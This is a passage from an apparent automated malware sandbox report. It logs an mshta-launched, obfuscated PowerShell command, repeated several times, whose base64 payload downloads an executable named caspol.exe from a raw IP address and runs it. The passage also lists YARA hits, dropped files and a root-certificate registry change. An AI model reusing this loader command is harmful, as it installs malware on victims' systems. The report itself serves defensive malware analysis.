AgICAgICAgICAgICAgICAgICAgICAgICAkbnp1Y0ZVQXc6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTM2LzU1L2Nhc3BvbC5leGUiLCIkZU52OkFQUERBVEFcY2FzcG9sLmV4ZSIsMCwwKTtzVGFyVC1TbGVlUCgzKTtpZXggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOVjpBUFBEQVRBXGNhc3BvbC5leGUi'+[cHaR]0X22+'))')))"
                    Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sYStem32\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe" "PoWeRSheLL.ExE -EX bYpAss -nOP -W 1 -c DeViCecReDenTIaldEpLOyment ; iEx($(iEX('[SysteM.TExT.encODInG]'+[cHAR]58+[cHAR]58+'UTF8.GEtSTrINg([sysTem.cOnVERT]'+[cHAR]58+[chAr]58+'FrOMbASe64StrIng('+[chAR]34+'JG56dWNGVUF3ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10WVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbWJlUkRFRklOaVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWlBudFZzUmhBaCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNeWpwcUlrUXdEYixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB1alFRcFNYb0lXeSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhWXlwdmx5a3BlKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZFhHTSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNRVNwYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgV1BmVyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkbnp1Y0ZVQXc6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTM2LzU1L2Nhc3BvbC5leGUiLCIkZU52OkFQUERBVEFcY2FzcG9sLmV4ZSIsMCwwKTtzVGFyVC1TbGVlUCgzKTtpZXggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOVjpBUFBEQVRBXGNhc3BvbC5leGUi'+[cHaR]0X22+'))')))"Jump to behavior
                    Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sYStem32\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe" "PoWeRSheLL.ExE -EX bYpAss -nOP -W 1 -c DeViCecReDenTIaldEpLOyment ; iEx($(iEX('[SysteM.TExT.encODInG]'+[cHAR]58+[cHAR]58+'UTF8.GEtSTrINg([sysTem.cOnVERT]'+[cHAR]58+[chAr]58+'FrOMbASe64StrIng('+[chAR]34+'JG56dWNGVUF3ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10WVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbWJlUkRFRklOaVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWlBudFZzUmhBaCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNeWpwcUlrUXdEYixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB1alFRcFNYb0lXeSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhWXlwdmx5a3BlKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZFhHTSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNRVNwYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgV1BmVyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkbnp1Y0ZVQXc6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTM2LzU1L2Nhc3BvbC5leGUiLCIkZU52OkFQUERBVEFcY2FzcG9sLmV4ZSIsMCwwKTtzVGFyVC1TbGVlUCgzKTtpZXggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOVjpBUFBEQVRBXGNhc3BvbC5leGUi'+[cHaR]0X22+'))')))"
                    Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sYStem32\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe" "PoWeRSheLL.ExE -EX bYpAss -nOP -W 1 -c DeViCecReDenTIaldEpLOyment ; iEx($(iEX('[SysteM.TExT.encODInG]'+[cHAR]58+[cHAR]58+'UTF8.GEtSTrINg([sysTem.cOnVERT]'+[cHAR]58+[chAr]58+'FrOMbASe64StrIng('+[chAR]34+'JG56dWNGVUF3ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10WVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbWJlUkRFRklOaVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWlBudFZzUmhBaCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNeWpwcUlrUXdEYixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB1alFRcFNYb0lXeSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhWXlwdmx5a3BlKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZFhHTSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNRVNwYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgV1BmVyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkbnp1Y0ZVQXc6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTM2LzU1L2Nhc3BvbC5leGUiLCIkZU52OkFQUERBVEFcY2FzcG9sLmV4ZSIsMCwwKTtzVGFyVC1TbGVlUCgzKTtpZXggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOVjpBUFBEQVRBXGNhc3BvbC5leGUi'+[cHaR]0X22+'))')))"
                    Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sYStem32\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe" "PoWeRSheLL.ExE -EX bYpAss -nOP -W 1 -c DeViCecReDenTIaldEpLOyment ; iEx($(iEX('[SysteM.TExT.encODInG]'+[cHAR]58+[cHAR]58+'UTF8.GEtSTrINg([sysTem.cOnVERT]'+[cHAR]58+[chAr]58+'FrOMbASe64StrIng('+[chAR]34+'JG56dWNGVUF3ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10WVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbWJlUkRFRklOaVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWlBudFZzUmhBaCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNeWpwcUlrUXdEYixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB1alFRcFNYb0lXeSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhWXlwdmx5a3BlKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZFhHTSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNRVNwYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgV1BmVyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkbnp1Y0ZVQXc6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTM2LzU1L2Nhc3BvbC5leGUiLCIkZU52OkFQUERBVEFcY2FzcG9sLmV4ZSIsMCwwKTtzVGFyVC1TbGVlUCgzKTtpZXggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOVjpBUFBEQVRBXGNhc3BvbC5leGUi'+[cHaR]0X22+'))')))"
                    Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sYStem32\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe" "PoWeRSheLL.ExE -EX bYpAss -nOP -W 1 -c DeViCecReDenTIaldEpLOyment ; iEx($(iEX('[SysteM.TExT.encODInG]'+[cHAR]58+[cHAR]58+'UTF8.GEtSTrINg([sysTem.cOnVERT]'+[cHAR]58+[chAr]58+'FrOMbASe64StrIng('+[chAR]34+'JG56dWNGVUF3ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10WVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbWJlUkRFRklOaVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWlBudFZzUmhBaCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNeWpwcUlrUXdEYixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB1alFRcFNYb0lXeSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhWXlwdmx5a3BlKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZFhHTSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNRVNwYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgV1BmVyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkbnp1Y0ZVQXc6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTM2LzU1L2Nhc3BvbC5leGUiLCIkZU52OkFQUERBVEFcY2FzcG9sLmV4ZSIsMCwwKTtzVGFyVC1TbGVlUCgzKTtpZXggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOVjpBUFBEQVRBXGNhc3BvbC5leGUi'+[cHaR]0X22+'))')))"Jump to behavior
                    Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sYStem32\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe" "PoWeRSheLL.ExE -EX bYpAss -nOP -W 1 -c DeViCecReDenTIaldEpLOyment ; iEx($(iEX('[SysteM.TExT.encODInG]'+[cHAR]58+[cHAR]58+'UTF8.GEtSTrINg([sysTem.cOnVERT]'+[cHAR]58+[chAr]58+'FrOMbASe64StrIng('+[chAR]34+'JG56dWNGVUF3ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10WVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbWJlUkRFRklOaVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWlBudFZzUmhBaCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNeWpwcUlrUXdEYixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB1alFRcFNYb0lXeSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhWXlwdmx5a3BlKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZFhHTSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNRVNwYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgV1BmVyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkbnp1Y0ZVQXc6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTM2LzU1L2Nhc3BvbC5leGUiLCIkZU52OkFQUERBVEFcY2FzcG9sLmV4ZSIsMCwwKTtzVGFyVC1TbGVlUCgzKTtpZXggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOVjpBUFBEQVRBXGNhc3BvbC5leGUi'+[cHaR]0X22+'))')))"
                    Source: Yara matchFile source: 28.2.rrwscqkDSNwLK.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 28.2.rrwscqkDSNwLK.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.caspol.exe.3529c50.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.caspol.exe.3529c50.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.caspol.exe.350fc30.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.caspol.exe.350fc30.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000001C.00000002.494317016.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000025.00000002.532965241.00000000025D3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.470705091.0000000002410000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.471306771.000000000350F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.471306771.0000000003529000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000015.00000002.500711423.0000000002591000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: caspol.exe PID: 3888, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: rrwscqkDSNwLK.exe PID: 1644, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: rrwscqkDSNwLK.exe PID: 3576, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: caspol.exe PID: 4076, type: MEMORYSTR
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\i4ik0bio\i4ik0bio.cmdline"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\zpwvvpvf\zpwvvpvf.cmdline"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\i4ik0bio\i4ik0bio.cmdline"Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\zpwvvpvf\zpwvvpvf.cmdline"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_000007FE891A022D push eax; iretd 5_2_000007FE891A0241
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_000007FE891A00BD pushad ; iretd 5_2_000007FE891A00C1
                    Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exeCode function: 21_2_003A75C0 push eax; retn 0050h21_2_003A76C9
                    Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exeCode function: 28_2_00402AC0 push eax; ret 28_2_00402AD4
                    Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exeCode function: 28_2_00402AC0 push eax; ret 28_2_00402AFC
                    Source: C:\Users\user\AppData\Roaming\caspol.exeCode function: 37_2_003775C8 push eax; retn 004Eh37_2_003776D1
                    Source: caspol[1].exe.5.drStatic PE information: section name: .text entropy: 7.924032890568231
                    Source: caspol.exe.5.drStatic PE information: section name: .text entropy: 7.924032890568231
                    Source: rrwscqkDSNwLK.exe.11.drStatic PE information: section name: .text entropy: 7.924032890568231
                    Source: 11.2.caspol.exe.354e230.4.raw.unpack, nv7TQuQu3ElwogYNXj.csHigh entropy of concatenated method names: 'kwIsqkQ4Rt', 'Dils45fHjB', 'ksMs07h5L2', 'jwvsQSg7TT', 'iZ9soFlRPV', 'uwusHFFDLN', 'uUqsAweIY5', 'qMDsm13UUL', 'evCs7ibb3u', 'wTQsMLXODh'
                    Source: 11.2.caspol.exe.354e230.4.raw.unpack, RFaVxJDvsI7VbX0rl8.csHigh entropy of concatenated method names: 'd49r8TOJeG', 'qlvrJty0GK', 'IECrVL6mP9', 'wC3rlu6pT8', 'edZrwxKaO9', 'wmsVWJxMJT', 'nJgViubqOf', 'BLHVGX4V2W', 'CUZVuCwxWf', 'XhKVUedFu9'
                    Source: 11.2.caspol.exe.354e230.4.raw.unpack, LZqk9e1XKPg1FCeZSx.csHigh entropy of concatenated method names: 'qaiAP6BRe1', 'CKLAEy28Or', 'ToString', 'a79Ay4JWyw', 'iZ9AJyunmv', 'vndAsDJ3jY', 'NSMAVZ0nYt', 'xwWArQrxVU', 'bbLAlE71L4', 'TknAwZ99eR'
                    Source: 11.2.caspol.exe.354e230.4.raw.unpack, fDuVmmOK1PX8TL4smgV.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'H9PMXVeJNr', 'ORPMar7pub', 'CmgMf2erEt', 'yfwMtmuVJ4', 'uShMgho4tV', 'LJtMjyo9sR', 'RQ9M1FDccQ'
                    Source: 11.2.caspol.exe.354e230.4.raw.unpack, EOwDB4zANQSug4vNC0.csHigh entropy of concatenated method names: 'RKxM4S846L', 'htBM0fr1ra', 'FC5MQAfoHf', 'b3nMDxvvmJ', 'nSrMnRKqa6', 'U0uMxovn9e', 'oCVMIvbShl', 'RhxMcBhInt', 'YxmMYwyWqs', 'jWFMkmh4YG'
                    Source: 11.2.caspol.exe.354e230.4.raw.unpack, NQpbydT9UJ3x7aC7ll.csHigh entropy of concatenated method names: 'm9VlYVZ779', 'hYflkxHXKq', 'JiplSH36wp', 'ipVlq3aL8m', 'SaTl9VKKM6', 'Qrol4dQSrb', 'ppNlRTTVw8', 'QPjl0OQUjS', 'sdLlQKPNNu', 'hEvlpFBNnE'
                    Source: 11.2.caspol.exe.354e230.4.raw.unpack, zHSLcC0xi2VDKUoIki.csHigh entropy of concatenated method names: 'gqJJt8bpuy', 'chKJgb7VEy', 'fGYJj3jxDJ', 'S8eJ1vvNHX', 'yxrJWbgDoI', 'nKfJi7EYZM', 'kTfJGMHELS', 'jdaJuGbQWu', 'HUQJUSCJAx', 'DMWJ5fVkdg'
                    Source: 11.2.caspol.exe.354e230.4.raw.unpack, l7WCInZ4VPxOCXSEYv.csHigh entropy of concatenated method names: 'uL8SyuRtP', 'XQ5qnBGp5', 'fdv4KayTV', 'LQZRvMkyl', 'YMWQCB5d3', 'S7xpO8Hqe', 'YlWl3430BFBwncwUKJ', 'GJ4bQqB12ORsZ5dlg2', 'wtimS54KW', 'tdvMDXOFW'
                    Source: 11.2.caspol.exe.354e230.4.raw.unpack, ejA9J2OOLcg6cn7VOAK.csHigh entropy of concatenated method names: 'OliM5DXEsC', 'LQcMzYbHH4', 'biC3K1MhMe', 'Vgh3OkW19w', 'MyP3Z30MJ1', 'nxD3v3Z1Hj', 'N8L32EXWAv', 'xfj38y71Oe', 'CxC3yJkXsk', 'n6q3JBPlnf'
                    Source: 11.2.caspol.exe.354e230.4.raw.unpack, WGVBOO5rrSDsqq28a0.csHigh entropy of concatenated method names: 'zxWMsyqmcO', 'xBKMVLK3DL', 'OJEMro5MhQ', 'iyNMltsAmf', 'h2NM7cDQHY', 'Vf3MwJCXCH', 'Next', 'Next', 'Next', 'NextBytes'
                    Source: 11.2.caspol.exe.354e230.4.raw.unpack, naonpTtnkvVd0Lx6yR.csHigh entropy of concatenated method names: 'fBHoeor5eG', 'p8NoaXobKn', 'gx7otaahjZ', 'CesoglZWn0', 'pxBonEa9WU', 'hEOoBvCaUi', 'X5Joxp8qkk', 'AgMoIqcqpl', 'INRoF0mfpu', 'EbNoChpdo5'
                    Source: 11.2.caspol.exe.354e230.4.raw.unpack, hhkxhSpONosID7AIZ0.csHigh entropy of concatenated method names: 'OLJV9igeke', 'pCmVRHUUtn', 'DFHsBemItd', 'setsxdwdlk', 'B1fsIM1RWN', 'hnfsFVgF04', 'icGsC6ScTJ', 'Bv2sdZtYj7', 'c83sT8mac4', 'Aeyse4DYml'
                    Source: 11.2.caspol.exe.354e230.4.raw.unpack, a6RnQjwUyOApqVRoTt.csHigh entropy of concatenated method names: 'GDqv8AQAo0', 'fPWvyw8Gev', 'MilvJcAcrX', 'z6nvsm1HU7', 'GU4vVVp25E', 'P9pvrwHp48', 'ddvvlRvm5B', 'm24vwt17DP', 'VUjvLPeI9X', 'S8lvP4GFHc'
                    Source: 11.2.caspol.exe.354e230.4.raw.unpack, IJUcGuiXoH6oteQitt.csHigh entropy of concatenated method names: 'W9UAuehVRC', 'F3KA5Ahfle', 'rDCmK6FGoM', 'ENNmOiijkn', 'zFsAXpti6F', 'dAUAa7vK0N', 'H06AfOrhMg', 's5cAtgGihI', 'A1IAgVkTbX', 'r7uAjEfmeo'
                    Source: 11.2.caspol.exe.354e230.4.raw.unpack, L4oEi92lLXbHukyhd4.csHigh entropy of concatenated method names: 'e5SOlHSLcC', 'Ii2OwVDKUo', 'Wu3OPElwog', 'xNXOEjshkx', 'sAIOoZ0tFa', 'ixJOHvsI7V', 'LCAAOqUlND4diNBGEF', 'U1gjSgECcjRPEDjs6U', 'KrWOOkBTyH', 'jZeOv3QYL3'
                    Source: 11.2.caspol.exe.354e230.4.raw.unpack, da1BCSJJ6wrPB4DfAI.csHigh entropy of concatenated method names: 'Dispose', 'w4DOU0Ajbi', 'RuEZnReX0k', 'z9kPDVvpk9', 'WpKO5e0Vxg', 'j4sOzjC67c', 'ProcessDialogKey', 'ayoZK0va9o', 'gbAZOZ05HB', 'TPyZZGGVBO'
                    Source: 11.2.caspol.exe.354e230.4.raw.unpack, vjZivjf2CXinRayulp.csHigh entropy of concatenated method names: 'PF2h02Yl7c', 'A4jhQudmOX', 'D5MhDdOESN', 'uYOhnVtpef', 'L0YhxJhSOS', 'WCMhIslmlM', 'uVyhCGShPX', 'b9BhdL5ilR', 'stYhe5Urux', 't2nhXQ7PEE'
                    Source: 11.2.caspol.exe.354e230.4.raw.unpack, ISvCPyGxpb4D0AjbiG.csHigh entropy of concatenated method names: 'dKf7oIul6p', 'LRQ7AGZEjR', 'SG377p98xG', 'ppL73NuNCl', 'LHc7NMKubp', 'edC7cv9I79', 'Dispose', 'pXhmy2gEAK', 'wV7mJqTe3d', 'HaXmsHYu5o'
                    Source: 11.2.caspol.exe.354e230.4.raw.unpack, DgHiCnCAXew4U8UW26.csHigh entropy of concatenated method names: 'YhElyvaAWh', 'DUDlsyoEtP', 'kSOlrjUqwV', 'S2ar5PtZee', 'GITrzURRs1', 'QZYlKJfo8c', 'CVGlOLDgrK', 'BpmlZ6xQng', 'X9Glv89kE8', 'RL1l21qZa0'
                    Source: 11.2.caspol.exe.354e230.4.raw.unpack, o0va9oUJbAZ05HB1Py.csHigh entropy of concatenated method names: 'dFL7DtW72v', 'BNm7nNf6Rx', 'Nsl7BnCfx6', 'CQF7xqpOIG', 'Ms37ItQKef', 'hBL7FphnQ1', 'mMn7CGROo3', 'qph7dhisEq', 'GWV7TBkMaq', 'BYo7excHLu'

                    Persistence and Installation Behavior

                    barindex
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\caspol.exeJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\caspol[1].exeJump to dropped file
                    Source: C:\Users\user\AppData\Roaming\caspol.exeFile created: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exeJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\zpwvvpvf\zpwvvpvf.dllJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\i4ik0bio\i4ik0bio.dllJump to dropped file
                    Source: C:\Users\user\AppData\Roaming\caspol.exeFile created: C:\Users\user\AppData\Roaming\CF97F5\5879F5.exe (copy)Jump to dropped file

                    Boot Survival

                    barindex
